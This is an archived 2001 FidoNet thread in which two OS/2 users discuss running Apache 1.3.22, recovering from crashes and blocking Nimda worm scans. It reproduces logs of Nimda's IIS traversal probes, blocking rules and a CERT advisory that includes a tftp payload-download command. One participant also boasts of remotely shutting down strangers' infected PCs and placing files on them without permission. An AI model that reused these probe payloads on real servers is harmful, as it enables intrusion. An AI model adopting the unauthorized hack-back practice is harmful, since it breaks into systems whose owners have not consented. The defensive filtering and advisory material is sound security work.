Well, Apache 1.3.22 is up and running for test purposes at the already known 208.180.150.64 address for 1:117/3001 here as well as on some other boxen for research ..

I stuck my, not-designed-to-ever-encourgage-web-traffic page mirrored on it for
test purposes here on site. The idea being that it is still going to be far cheaper to eventually use the fixed IP address I'm stabilizing, or trying to, instead of pay my IP to host dis and dat.

Well maybe ..

Instantly .. about a quarter of a meg a day even on this DHCP address of logs similar to:

208.180.150.64 - - [26/Oct/2001:20:00:00 +0000] "GET /apache_pb.gif
HTTP/1.0" 200 2326
208.180.221.87 - - [26/Oct/2001:20:15:43 +0000] "GET
/scripts/root.exe?/c+dir HTTP/1.0" 404 280
208.180.221.87 - - [26/Oct/2001:20:15:44 +0000] "GET /MSADC/root.exe?/c+dir
HTTP/1.0" 404 278
208.180.221.87 - - [26/Oct/2001:20:15:49 +0000] "GET
/c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 288
208.180.221.87 - - [26/Oct/2001:20:15:50 +0000] "GET
/d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 288
208.180.221.87 - - [26/Oct/2001:20:15:52 +0000] "GET
/scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 302
208.180.221.87 - - [26/Oct/2001:20:15:53 +0000] "GET
/_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
HTTP/1.0" 404 319
208.180.221.87 - - [26/Oct/2001:20:15:55 +0000] "GET
/_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
HTTP/1.0" 404 319
208.180.221.87 - - [26/Oct/2001:20:15:57 +0000] "GET
/msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir
HTTP/1.0" 404 335
208.180.221.87 - - [26/Oct/2001:20:16:07 +0000] "GET
/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 301
208.180.221.87 - - [26/Oct/2001:20:16:08 +0000] "GET
/scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 301
208.180.221.87 - - [26/Oct/2001:20:16:10 +0000] "GET
/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 301
208.180.221.87 - - [26/Oct/2001:20:16:14 +0000] "GET
/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 301
208.180.221.87 - - [26/Oct/2001:20:16:15 +0000] "GET
/scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 285
208.180.221.87 - - [26/Oct/2001:20:16:17 +0000] "GET
/scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 285
208.180.221.87 - - [26/Oct/2001:20:16:27 +0000] "GET
/scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 302
208.180.221.87 - - [26/Oct/2001:20:16:28 +0000] "GET
/scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 302

Of course all the 208.180.###.### are coming from my COX IP's dominion! But gee, maybe I ought to let them suffer instead of asking IJFIRE to dump dis and dat and having to constantly re-write the dump matrix stuff?

I see where Mikey has more to learn.

On a more practical note, Apache has one other disturbing error I've seen for the first time. I get very few trap errors on this old 1542C Adaptec SCSI box!
Yes, it is tape backed, even so that it only hosts all the BBS and TELNET and FTP server stuff ... but ..

Apache has this nice need to perform a graceful shutdown rather than just whatever. And there are short kill scripts to help both do that as well as perform a graceful re-start.

But remember! This is the box I've had some of these curious hard locks with no trap errors which .. now more conclusively point to the CANARY portion of NORMAN 4.73 that is looking at the SYSTEM stuff on scan going into DOS-VDM sessions via the OS/2 .CMD file which runs things..

One of them taught me a new lesson about APACHE 1.3.22 yesterday. If you abend
the box and bring it up hard through CHKDSK, APACHE throws repeated SYS3175 after SYS3175 forever with the Desktop nearly locked if the TCP/IP interface is
not up and running as the aut-load for the desktop attempts to rebuild the desktop from the crash. I quote:

------------------------------------------------------------

10-29-2001 07:18:58 SYS3175 PID 0051 TID 0001 Slot 0077
C:\APACHE\HTTPD.EXE
c0000005
1e4b51fc
P1=00000001 P2=171b00d8 P3=XXXXXXXX P4=XXXXXXXX
EAX=00000000 EBX=171b0080 ECX=00000001 EDX=00000000
ESI=000321d4 EDI=0004ffec
DS=0053 DSACC=f0f3 DSLIM=ffffffff
ES=0053 ESACC=f0f3 ESLIM=ffffffff
FS=150b FSACC=00f3 FSLIM=00000030
GS=0000 GSACC=**** GSLIM=********
CS:EIP=005b:1e4b51fc CSACC=f0df CSLIM=ffffffff
SS:ESP=0053:0282fd8c SSACC=f0f3 SSLIM=ffffffff
EBP=0282fd98 FLG=00012202

LIBHTTPD.DLL 0001:000051fc

I discovered that with a great deal of fanfare, I can intercept the building Desktop inbetween END, END, END, runs of the trap error message. One by one I can get all the BBS tasks and so on killed. Then inbetween the brief flashes of another SYS3175 error just like the above, I can open the APACHE folder, and
then with work, slam in the KILL script which will properly terminate this beast!

That is not good.

Fine. I can go to use the RESTARTOBJECTSONLY game? Or maybe go to the method of restarting the entire Desktop and the WPS out of STARTUP folder? But I sure can't go to an auto-restart deal on a trap deal, can I? The box would forever get trapped in round after round of this!

Knowing this now, early in the burn, How do I maintain the mission critical and especially REMOTE RESET capability of a box like this under this scenario?

Any thought about using the KILL script as part of the .CMD file to fire off this beast on a STARTUP.CMD approach, then firing it off as a second step in that game?

Equally important from an OS2INET standpoint, just what methodology does one use with our available OS/2 tools for net connectivity to keep a joint BBS and INET server presence up mission critical style?

Inquiring mind wants to know.

Sleep well; OS/2's still awake! ;)

Mike @ 1:117/3001




--- Maximus/2 3.01
* Origin: Ziplog Public Port (1:117/3001)

Instantly .. about a quarter of a meg a day even on this DHCP
address of logs similar to:

208.180.221.87 - - [26/Oct/2001:20:15:43 +0000] "GET
/scripts/root.exe?/c+dir HTTP/1.0" 404 280
208.180.221.87 - - [26/Oct/2001:20:15:44 +0000] "GET /MSADC/root.exe?/c+dir
HTTP/1.0" 404 278

welcome to the world of the NIMDA worm attempting to infect your server <<GG>>
there are a few tricks to handle this... however, the standard 404 page is ok, too... unless you can block on ip packet contents, this'll be with us for a while...

Of course all the 208.180.###.### are coming from my COX IP's
dominion! But gee, maybe I ought to let them suffer instead
of asking IJFIRE to dump dis and dat and having to constantly
re-write the dump matrix stuff?

i'd be firing off reports to cos letting them know the address and what its doing... it should be up to them to determine who has that connection and notify them (as well as knocking them off the net until they get their stuff cleaned up and patched properly)...

[trim]

Equally important from an OS2INET standpoint, just what
methodology does one use with our available OS/2 tools for net connectivity to keep a joint BBS and INET server presence up
mission critical style?

i let injoy start and stop my apache server when it connects and when i specifically click on the hangup button... other than that, if i have to get off the net, i simply unplug the phone line and stop injoy from dialing out... i use a script to determine if my apache is already up and if it is not, i start it... i also do this with my "DDNS" updater program...

)\/(ark


* Origin: (1:3634/12)

Thanks, Mark ...

welcome to the world of the NIMDA worm attempting to infect your server

<<GG>> there are a few tricks to handle this...

however, the standard 404 page is ok, too... unless
you can block on ip packet contents, this'll be with
us for a while...

I have a worse introduction than this, though. Port 137/138 to Port 139 versions of this Nimda.# worm *CAN* get to an OS/2 TCPBUIE box. That's another
on-going research project I've not had time to finish yet as to whether or not there really is a hole on OS/2 NETBIOS. Too much to do yet to set up the test pair of computers across my IP to do the work, groan. But I've already had two infestations of all the files on one box until I too out Port 80 with IJFIRE until I could do something more specific.

Well, I think IJFIRE's ruleset can be used to block on packet contents. Thus I supposed, but haven't been down this pig trail, that one has to write the rulebase for each such thingy, down to the point where there is a common string
content for that. In this case, what I think you are saying is that I have to think out writing the 'rule' for it. I have to either ue the .CFG rulebase or filter based on the packet content for what would be an INSTR or similar sort of mid character array. That could be on the:

208.180.221.87 - - [26/Oct/2001:20:15:43 +0000] "GET
/scripts/root.exe?/c+dir HTTP/1.0" 404 280
208.180.221.87 - - [26/Oct/2001:20:15:44 +0000] "GET
/MSADC/root.exe?/c+dir
HTTP/1.0" 404 278

-----> GET/MSADC/root.exe?/

right? Since I don't have such, it's common to those two hits, IJFIRE is told to simply drop them, right? I at first thought that it would be a simple matter to block it on the basis of packet type. But now that I look at how it is done, I think I've learned that won't work. Hold this thought for a moment for log comments below.

i'd be firing off reports to cos letting them know the address and what its doing... it should be up to them to determine who
has that connection and notify them (as well as
knocking them off the net until they get their stuff
cleaned up and patched properly)...

You can do that by filing the logs with abuse@cox-internet.com as I actually did for the two sites that did get in using a twisted Port 137/138 morphed ot Port 139 game somehow.

i let injoy start and stop my apache server when it connects and when i specifically click on the hangup button... other than
that, if i have to get off the net, i simply unplug
the phone line and stop injoy from dialing out... i
use a script to determine if my apache is already up
and if it is not, i start it... i also do this with my
"DDNS" updater program...

Well, from the SYS3175's that Apache 1.3.22 throws, apparently when the Desktop
trys to rebuild itself on a botched shutdown, I think what you really need to do might be to force a graceful shutdown before the thing is loaded each time!
You would modify the normal startup to do that. The SHUTDOWN.CMD which is really a REXX script is:

/* Rexx script to shut down Apache */

pid = linein("logs\httpd.pid")
'kill.exe -TERM 'pid

It can be run over and over again if it isn't running with no abend. Thus whay
can't you just use that prior to each load and when the desktop goes to autorebuild, it gets properly terminated? If you use an error trap routine in REXX unless you get a null return for the loader line it just rolls aroun to the script start until the IP comes back clean?

I'm cable hosted. I can't just yank the phone line if I'M not here and something goes bad wrong that someone else can only fix by pushing the reset box on a locked box!

Sleep well; OS/2's still awake! ;)

Mike @ 1:117/3001

--- Maximus/2 3.01
* Origin: Ziplog Public Port (1:117/3001)

More learning from Mark! Thank you so much for sharing...

I have a worse introduction than this, though. Port 137/138
to Port 139 versions of this Nimda.# worm *CAN* get to an OS/2
TCPBUIE box.

those ports are normal netbeui/netbios over tcp/ip stuff, AFAIK... i don't know what is used in a non-tcp/ip configuration
for netbeui/netbios...

Nor I.

uuuggghhh... and here i sit behind injoy v2.0b with
nothing else between that box and the net... have that
apache/2 1.3.22 server running and a couple of
aliasmatch statements in httpd.conf to at least send
something i want to send back... in fact, my stuff has
a bit more output than many because i fully expect
that some stuff may be being sent manually by a person
attempting to hack in themselves...

Interesting.

here's those aliasmatch statements...

Snipped for bandwidth but put into the keep and learn how to do this!

you might also find this one useful...

Ditto.

RedirectMatch (.*).ico$ http://www.microsoft.com$1.ico

# That one liner above will redirect all ".ico" request from
# your server to the Microsoft server. Now you'll be letting
# their damm server deal with the errors and bandwidth. It
# will NOT interupt your traffic at all! If MS is going to
# request files from your server, it's only appropriate that
# they deal with the problems they cause...

Mmm . Mint Cookies, saved in notebook! Gee how little I know, And I never really wanted to .. oh well. Such is life! ;)

right?

yes, pretty much... i think i'd trap on
"/path/root.exe" and each of the others... in
otherwords, just shorten it enough to get just that
stuff without having to parse too much... it really
should be enough to let apache handle it but it is
possible that one may see 1000+ hits per second from
NIMDAs all over the first two ip octets you're in...

I think I know enough to begin writing here... Trying to triage all this into what is most proactical (I'll leave you to figure out about four terrible pun relationships in that coineed word!) at this point!

yes, that should work... hopefully ijfire won't get
bogged down trying to handle the possible high numbers
of hits or even get taken out, itself...

I've read into that this can happen but hav no information on what the chances are based on this level of attack rates.

ok... i'll add that address to my abuse addresses list... don't know
that i'll need it unless i get hit from there during
one/some of the random ip number generation attacks
that nimda uses... in many cases, i've been able to
hop over to one of the windows boxes, here, and smack
that attacking machine right off the entire network...

How delicate!

it's quite easy when you can use the windows sdk (i
think) shutdown.exe program(s) and tell it to shutdown
\\ipnumber\ipc$ (or whatever its called)... i've even
had some luck in placing patches and such on those
machines along with a text file in the startup folder
that tells them when they turn the machine back on why
it went down, where to locate the placed patches and
how to do it... even going so far as to specifically
tell them they HAVE to unplug the network wire during
the process so that they're not attacking or being attacked during the patching process... in a few cases, i've even called
them on the phone and talked to them directly telling
them who i was, what i was doing, and why... you
should hear some of their comments when i tell them
certain steps (like placing a file in a certain place
and they see it pop into existance via drag and drop
from my desktop! or when i send the shutdown command)
that i'm doing... there are times that i really wish
that i could see and capture their facial
expressions...

Sorry for my twisted humor personality, but you remember back when I think it was Jack Lemmon played the Devil, had turned this poor soul into a parrot? He didn't like it's looks, so he wrenched the beak around qrotesquely, looked at it with a tilted head like a parrot does, and then commented out of the side of
his mouth, "Definitely Piccasso!" ;)

i let injoy start and stop my apache server when it
connects and when i specifically click on the hangup
button... other than that, if i have to get off the
net, i simply unplug the phone line and stop injoy
from dialing out... i use a script to determine if my
apache is already up and if it is not, i start it...
i also do this with my "DDNS" updater program...

that may very well be... i dunno... my system has gone down the hard way when the UPS batteries have run out of power but i've
never had this problem because injoy hasn't dialed out
and connected until after the stuff has been rebuilt

I can reason this load-linee out mentally..

or whatever... i guess it may also help that that box
runs quite a few tasks all the time... from a clean
boot, CTRL-ESC shows twenty-three (23) tasks running
and those are running all the time as that machine's
server ops that i employ here...

But in this case, we're dealing with a problem, I think, at core level in the Kernel that sneaked in here at W40508 level. It wasn't there for the original level of FP 15. Showed up when I upgraded the Kernel only. I didn't get it caught in time and figured out to report it in Testcase officially. In the couple of months it took me isolate a trap like this that doesn't even trap the
box and leaves no way to trace it, things went far forward from W40508. Plus, who in heck wants to work with the Adaptec 1542C level cards which is the only place I see it? As well, I'm not at all sure the Kernel is really even the cause, as I've sorta now pinned it on the SYSTEM checking CANARY deal from Norman in conjunction with this.

To date Norman hasn't even answered the support help request... ;(

But with the /bs- option in the command line loads I use, and full semaphore and hand flag files created for SCANBLDP to keep more than one task at a time from hitting the same messaage area, the lock seems gone.

I'm cable hosted. ....

uuugh... that does toss in a bit of a sticky wicket,
eh? hummm... maybe you can run some sort of monitor
that checks that tcp/ip is up and operational before
apache is launched... you don't think it could be an
EMX thing failing, do you? what level are you at with
EMX and are you using the runtime only or the
development??

I'm at current level 4.09 as I recall. It reports, I think, 61 in the version dump screen. I'm also using the full development game, but really don't need that for this box. It's just easier to set up and dump in a common format for stuff like this everywhere than do this on one box and that on another.

Thanks,

This one showed up directly here on OS2INET by the way.

Sleep well; OS/2's still awake! ;)

Mike @ 1:117/3001

--- Maximus/2 3.01
* Origin: Ziplog Public Port (1:117/3001)

welcome to the world of the NIMDA worm attempting
to infect your server <<GG>> there are a few
tricks to handle this... however, the standard 404
page is ok, too... unless you can block on ip
packet contents, this'll be with us for a while...

I have a worse introduction than this, though. Port 137/138
to Port 139 versions of this Nimda.# worm *CAN* get to an OS/2
TCPBUIE box.

those ports are normal netbeui/netbios over tcp/ip stuff, AFAIK... i don't know
what is used in a non-tcp/ip configuration for netbeui/netbios...

That's another on-going research project I've
not had time to finish yet as to whether or not there really
is a hole on OS/2 NETBIOS. Too much to do yet to set up the
test pair of computers across my IP to do the work, groan. But
I've already had two infestations of all the files on one box
until I too out Port 80 with IJFIRE until I could do something
more specific.

uuuggghhh... and here i sit behind injoy v2.0b with nothing else between that box and the net... have that apache/2 1.3.22 server running and a couple of aliasmatch statements in httpd.conf to at least send something i want to send back... in fact, my stuff has a bit more output than many because i fully expect that some stuff may be being sent manually by a person attempting to hack in themselves...

here's those aliasmatch statements...

# these are to "stop" stupid attempts to use windows expolits on us
AliasMatch (.*)\cmd.exe "z:/apache/htdocs/idiots/index.html"
AliasMatch (.*)\root.exe "z:/apache/htdocs/idiots/index.html"
AliasMatch (.*)\admin.dll "z:/apache/htdocs/idiots/index.html"
AliasMatch (.*)\default.ida "z:/apache/htdocs/idiots/index.html"

i have these within the <IfModule mod_alias.c> container so that they are only loaded if the mod_alias module is loaded...

you might also find this one useful...

# Those of you who have seen the "file not found" /favicon.ico
# (for example) in your Apache error logs should listen here.
# All you have to do is add this line to your httpd.conf.
# I hate Microsoft IE 5. The supplied regular expression is
# matched against the URL, and if it matches, the server will
# substitute any parenthesized matches into the given string
# and use it as a filename. That will teach them.

RedirectMatch (.*).ico$ http://www.microsoft.com$1.ico

# That one liner above will redirect all ".ico" request from
# your server to the Microsoft server. Now you'll be letting
# their damm server deal with the errors and bandwidth. It
# will NOT interupt your traffic at all! If MS is going to
# request files from your server, it's only appropriate that
# they deal with the problems they cause...

Well, I think IJFIRE's ruleset can be used to block on packet
contents. Thus I supposed, but haven't been down this pig
trail, that one has to write the rulebase for each such
thingy, down to the point where there is a common string
content for that. In this case, what I think you are saying
is that I have to think out writing the 'rule' for it. I have
to either ue the .CFG rulebase or filter based on the packet
content for what would be an INSTR or similar sort of mid
character array. That could be on the:

208.180.221.87 - - [26/Oct/2001:20:15:43 +0000] "GET
/scripts/root.exe?/c+dir HTTP/1.0" 404 280
208.180.221.87 - - [26/Oct/2001:20:15:44 +0000] "GET
/MSADC/root.exe?/c+dir
HTTP/1.0" 404 278

-----> GET/MSADC/root.exe?/

right?

yes, pretty much... i think i'd trap on "/path/root.exe" and each of the others... in otherwords, just shorten it enough to get just that stuff without having to parse too much... it really should be enough to let apache handle it but it is possible that one may see 1000+ hits per second from NIMDAs all over the first two ip octets you're in...

Since I don't have such, it's common to those two
hits, IJFIRE is told to simply drop them, right?

yes, that should work... hopefully ijfire won't get bogged down trying to handle the possible high numbers of hits or even get taken out, itself...

I at first thought that it would be a simple matter to block
it on the basis of packet type. But now that I look at how
it is done, I think I've learned that won't work. Hold this
thought for a moment for log comments below.

'k...

i'd be firing off reports to cos letting them know
the address and what its doing... it should be up
to them to determine who has that connection and
notify them (as well as knocking them off the net
until they get their stuff cleaned up and patched
properly)...

You can do that by filing the logs with abuse@cox-internet.com
as I actually did for the two sites that did get in using a
twisted Port 137/138 morphed ot Port 139 game somehow.

ok... i'll add that address to my abuse addresses list... don't know that i'll need it unless i get hit from there during one/some of the random ip number generation attacks that nimda uses... in many cases, i've been able to hop over
to one of the windows boxes, here, and smack that attacking machine right off the entire network... it's quite easy when you can use the windows sdk (i think) shutdown.exe program(s) and tell it to shutdown \\ipnumber\ipc$ (or whatever its called)... i've even had some luck in placing patches and such on those machines along with a text file in the startup folder that tells them when they turn the machine back on why it went down, where to locate the placed
patches and how to do it... even going so far as to specifically tell them they
HAVE to unplug the network wire during the process so that they're not attacking or being attacked during the patching process... in a few cases, i've
even called them on the phone and talked to them directly telling them who i was, what i was doing, and why... you should hear some of their comments when i
tell them certain steps (like placing a file in a certain place and they see it
pop into existance via drag and drop from my desktop! or when i send the shutdown command) that i'm doing... there are times that i really wish that i could see and capture their facial expressions...

i let injoy start and stop my apache server when it
connects and when i specifically click on the hangup
button... other than that, if i have to get off the
net, i simply unplug the phone line and stop injoy
from dialing out... i use a script to determine if my
apache is already up and if it is not, i start it...
i also do this with my "DDNS" updater program...

Well, from the SYS3175's that Apache 1.3.22 throws, apparently
when the Desktop trys to rebuild itself on a botched shutdown,
I think what you really need to do might be to force a
graceful shutdown before the thing is loaded each time!

that may very well be... i dunno... my system has gone down the hard way when the UPS batteries have run out of power but i've never had this problem because
injoy hasn't dialed out and connected until after the stuff has been rebuilt or
whatever... i guess it may also help that that box runs quite a few tasks all the time... from a clean boot, CTRL-ESC shows twenty-three (23) tasks running and those are running all the time as that machine's server ops that i employ here...

[trim]

I'm cable hosted. I can't just yank the phone line if
I'M not here and something goes bad wrong that someone
else can only fix by pushing the reset box on a locked
box!

uuugh... that does toss in a bit of a sticky wicket, eh? hummm... maybe you can
run some sort of monitor that checks that tcp/ip is up and operational before apache is launched... you don't think it could be an EMX thing failing, do you?
what level are you at with EMX and are you using the runtime only or the development??

)\/(ark


* Origin: (1:3634/12)

here's that CERT advisory on NIMDA in case you haven't seen it... it may help you to understand how the shares infection has been getting in... it'll definitely awaken you to everything that NIMDA does <<GG>> i note that i'm at 500+ lines during this writting... apologies to "fred sanford" -- "It's the BIG
one, Mike!!" i've placed a few of my own comments within []'s and not worried about textlink translation... one can access this page on CERT/CC's site for that info if they like... watch the wordwrapping! some links contained herein are pretty long for these text only displays...

===== quoting http://www.cert.org/advisories/CA-2001-26.html =====

CERTr Advisory CA-2001-26 Nimda Worm

Original release date: September 18, 2001
Revised: September 25, 2001
Source: CERT/CC

A complete revision history is at the end of this file.


Systems Affected

Systems running Microsoft Windows 95, 98, ME, NT, and 2000


Overview

The CERT/CC has received reports of new malicious code known as the "W32/Nimda worm" or the "Concept Virus (CV) v.5." This new worm appears to spread by multiple mechanisms:

1. from client to client via email

2. from client to client via open network shares

3. from web server to client via browsing of
compromised web sites

4. from client to web server via active scanning
for and exploitation of various Microsoft IIS
4.0 / 5.0 directory traversal vulnerabilities
(VU#111677 and CA-2001-12)

5. from client to web server via scanning for the
back doors left behind by the "Code Red II"
(IN-2001-09), and "sadmind/IIS" (CA-2001-11)
worms

The worm modifies web documents (e.g., .htm, .html, and .asp files) and certain
executable files found on the systems it infects, and creates numerous copies of itself under various file names.

We have also received reports of denial of service as a result of network scanning and email propagation.


I. Description

The Nimda worm has the potential to affect both user workstations (clients) running Windows 95, 98, ME, NT, or 2000 and servers running Windows NT and 2000.


Email Propagation

This worm propagates through email arriving as a MIME "multipart/alternative" message consisting of two sections. The first section is defined as MIME type "text/html", but it contains no text, so the email appears to have no content. The second section is defined as MIME type "audio/x-wav", but it contains a base64-encoded attachment named "readme.exe", which is a binary executable.

Due to a vulnerability described in CA-2001-06 (Automatic Execution of Embedded
MIME Types), any mail software running on an x86 platform that uses Microsoft Internet Explorer 5.5 SP1 or earlier (except IE 5.01 SP2) to render the HTML mail automatically runs the enclosed attachment and, as result, infects the machine with the worm. Thus, in vulnerable configurations, the worm payload will automatically be triggered by simply opening (or previewing) this mail message. As an executable binary, the payload can also be triggered by simply running the attachment.

The email message delivering the Nimda worm appears to also have the following characteristics:

1. The text in the subject line of the mail
message appears to be variable.

2. There appear to be many slight variations
in the attached binary file, causing the MD5
checksum to be different when one compares
different attachments from different email
messages. However, the file length of the
attachment appears to consistently be 57344
bytes.

3. The worm also contains code that will attempt
to resend the infected email messages every 10
days.


Payload

The email addresses targeted for receiving the worm are harvested from two sources

1. the .htm and .html files in the user's web
cache folder

2. the contents of the user's email messages
retrieved via the MAPI service

These files are passed through a simple pattern matcher which collects strings that look like email addresses. These addresses then receive a copy of the worm
as a MIME-encoded email attachment. Nimda stores the time the last batch of emails were sent in the Windows registry, and every 10 days will repeat the process of harvesting addresses and sending the worm via email.

Likewise, the client machines begin scanning for vulnerable IIS servers. Nimda looks for backdoors left by previous IIS worms: Code Red II [IN-2001-09] and sadmind/IIS worm [CA-2001-11]. It also attempts to exploit various IIS Directory Traversal vulnerabilities (VU#111677 and CA-2001-12). The selection of potential target IP addresses follows these rough probabilities:

50% of the time, an address with the same
first two octets will be chosen

25% of the time, an address with the same
first octet will be chosen

25% of the time, a random address will be
chosen

The infected client machine attempts to transfer a copy of the Nimda code via tftp (69/UDP) to any IIS server that it scans and finds to be vulnerable.

Once running on the server machine, the worm traverses each directory in the system (including all those accessible through file shares) and writes a MIME-encoded copy of itself to disk using file names with .eml or .nws extensions (e.g., readme.eml). When a directory containing web content (e.g., HTML or ASP files) is found, the following snippet of Javascript code is appended to every one of these web-related files:
[modified here slightly so as to not trigger]

<$cript language="javascript">
w!ndow.open("readme.eml", null, "resizable=no,top=6000,left=6000")
</$cript>

This modification of web content allows further propagation of the worm to new clients through a web browser or through the browsing of a network file system.

In order to further expose the machine, the worm enables the sharing of the c: drive as C$ creates a "Guest" account on Windows NT and 2000 systems adds this account to the "Administrator" group.
[i've also seen d: drive as D$ and e: as E$]

Furthermore, the Nimda worm infects existing binaries on the system by creating
Trojan horse copies of legitimate applications. These Trojan horse versions of the applications will first execute the Nimda code (further infecting the system and potentially propagating the worm), and then complete their intended function.


Browser Propagation

As part of the infection process, the Nimda worm modifies all web content files
it finds (including, but not limited to, files with .htm, .html, and .asp extensions). As a result, any user browsing web content on the system, whether via the file system or via a web server, may download a copy of the worm. Some browsers may automatically execute the downloaded copy, thereby infecting the browsing system.
[i've seen netscape actually open and save the file in its cache directory or the %TEMP% directory. simply deleting the file is sufficient. its plain text containing a MIME encoded file.]


File System Propagation

The Nimda worm creates numerous MIME-encoded copies of itself (using file names
with .eml and .nws extensions) in all writable directories (including those found on a network share) to which the user has access. If a user on another system subsequently selects the copy of the worm file on the shared network drive in Windows Explorer with the preview option enabled, the worm may be able
to compromise that system.

Additionally, by creating Trojan horse versions of legitimate applications already installed on the system, users may unknowingly trigger the worm when attempting to make use of these programs.


System FootPrint

The scanning activity of the Nimda worm produces the following log entries for any web server listing on port 80/tcp:

GET /scripts/root.exe?/c+dir
GET /MSADC/root.exe?/c+dir
GET /c/winnt/system32/cmd.exe?/c+dir
GET /d/winnt/system32/cmd.exe?/c+dir
GET /scripts/..%5c../winnt/system32/cmd.exe?/c+dir
GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c+dir
GET /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c+dir
GET /msadc/..%5c../..%5c../..%5c/..\xc 1\x1c../..\xc1\x1c../..\xc1\x1c../winnt/system32/cmd.exe?/c+dir
GET /scripts/..\xc1\x1c../winnt/system32/cmd.exe?/c+dir
GET /scripts/..\xc0/../winnt/system32/cmd.exe?/c+dir
GET /scripts/..\xc0\xaf../winnt/system32/cmd.exe?/c+dir
GET /scripts/..\xc1\x9c../winnt/system32/cmd.exe?/c+dir
GET /scripts/..%35c../winnt/system32/cmd.exe?/c+dir
GET /scripts/..%35c../winnt/system32/cmd.exe?/c+dir
GET /scripts/..%5c../winnt/system32/cmd.exe?/c+dir
GET /scripts/..%2f../winnt/system32/cmd.exe?/c+dir

Note: The first four entries in these sample logs denote attempts to connect to
the backdoor left by Code Red II, while the remaining log entries are examples of exploit attempts for the Directory Traversal vulnerability.


II. Impact

Intruders can execute arbitrary commands within the LocalSystem security context on machines running the unpatched versions of IIS. In the case where a client is compromised, the worm will be run with the same privileges as the user who triggered it. Hosts that have been compromised are also at high risk for being party to attacks on other Internet sites.

The high scanning rate of the Nimda worm may also cause bandwidth denial-of-service conditions on networks with infected machines.


III. Solutions

Recommendations for System Administrators of IIS machines

To determine if your system has been compromised, look for the following:

a root.exe file (indicates a compromise by Code Red II
or sadmind/IIS worms making the system vulnerable to the
Nimda worm)

an Admin.dll file in the root directory of c:\, d:\, or
e:\ (Note that the file name Admin.dll may be legitimately
installed by IIS in other directories.)

unexpected .eml or .nws files in numerous directories

the presence of this string:

/c+tftp%20-i%20x.x.x.x%20GET%20Admin.dll%20d:\Admin.dll 200

in the IIS logs, where "x.x.x.x" is the IP address of the
attacking system. (Note that only the "200" result code
indicates success of this command.)

The only safe way to recover from the system compromise is to format the system
drive(s) and reinstall the system software from trusted media (such as vendor-supplied CD-ROM). Additionally, after the software is reinstalled, all vendor-supplied security patches must be applied. The recommended time to do this is while the system is not connected to any network. However, if sufficient care is taken to disable all server network services, then the patches can be downloaded from the Internet.

Detailed instructions for recovering your system can be found in the CERT/CC tech tip:

Steps for Recovering from a UNIX or NT System Compromise


Apply the appropriate patch from your vendor

A cumulative patch which addresses all of the IIS-related vulnerabilities exploited by the Nimda worm is available from Microsoft at

http://www.microsoft.com/technet/security/bulletin/MS01-044.asp


Recommendations for Network Administrators

Ingress filtering

Ingress filtering manages the flow of traffic as it enters a network under your
administrative control. Servers are typically the only machines that need to accept inbound connections from the public Internet. In the network usage policy of many sites, there are few reasons for external hosts to initiate inbound connections to machines that provide no public services. Thus, ingress filtering should be performed at the border to prohibit externally initiated inbound connections to non-authortized services. With Nimda, ingress filtering of port 80/tcp could prevent instances of the worm outside of your network from
scanning or infecting vulnerable IIS servers in the local network that are not explicitly authorized to provide public web services. Filtering of port 69/udp will also prevent the downloading of the worm to IIS via tftp.

Cisco has published a tech tip specifically addressing filtering guidelines to mitigate the impact of the Nimda worm at

http://www.cisco.com/warp/public/63/nimda.shtml


Egress filtering

Egress filtering manages the flow of traffic as it leaves a network under your administrative control. There is typically limited need for machines providing public services to initiate outbound connections to the Internet. In the case of Nimda, employing egress filtering on port 69/udp at your network border will
prevent certain aspects of the worms propogation both to and from your network.


Recommendations for End User Systems

Apply the appropriate patch from your vendor

If you are running a vulnerable version of Internet Explorer (IE), the CERT/CC recommends upgrading to at least version 5.0 since older versions are no longer
officially maintained by Microsoft. Users of IE 5.0 and above are encourage to apply patch for the "Automatic Execution of Embedded MIME Types" vulnerability available from Microsoft at

http://www.microsoft.com/technet/security/bulletin/MS01-020.asp

Note: IE 5.5 SP1 users should apply the patches discussed in MS01-027


Run and Maintain an Anti-Virus Product

It is important for users to update their anti-virus software. Most anti-virus software vendors have released updated information, tools, or virus databases to help detect and partially recover from this malicious code. A list of vendor-specific anti-virus information can be found in Appendix A.

Many anti-virus packages support automatic updates of virus definitions. We recommend using these automatic updates when available.


Don't open e-mail attachments

The Nimda worm may arrive as an email attachment named "readme.exe". Users should not open this attachment.


Disable JavaScript

End-user systems can become infected with the Nimda worm by browsing web sites hosted by infected servers. This method of infection requires the use of JavaScript to be successful. Therefore, the CERT/CC recommends that end user systems disable JavaScript until all appropriate patches have been applied and anti-virus software has been updated.


Appendix A. Vendor Information

Antivirus Vendor Information

Aladdin Knowledge Systems
http://www.eSafe.com/home/csrt/valerts2.asp?virus_no=10087

Central Command, Inc.
http://support.centralcommand.com/cgi-bin/command.cfg/php/enduser/std_adp.php?
p_refno=010918-000005

Command Software Systems
http://www.commandsoftware.com/virus/nimda.html

Computer Associates
http://www.ca.com/virusinfo/encyclopedia/descriptions/n/nimda.htm

F-Secure Corp
http://www.fsecure.com/v-descs/nimda.shtml

McAfee
http://vil.mcafee.com/dispVirus.asp?virus_k=99209&

Panda Software
http://service.pandasoftware.es/library/card.jsp?Virus=Nimda

Proland Software
http://www.pspl.com/virus_info/worms/nimda.htm

Sophos
http://www.sophos.com/virusinfo/analyses/w32nimdaa.html

Symantec
http://www.symantec.com/avcenter/venc/data/w32.nimda.a@mm.html

Trend Micro
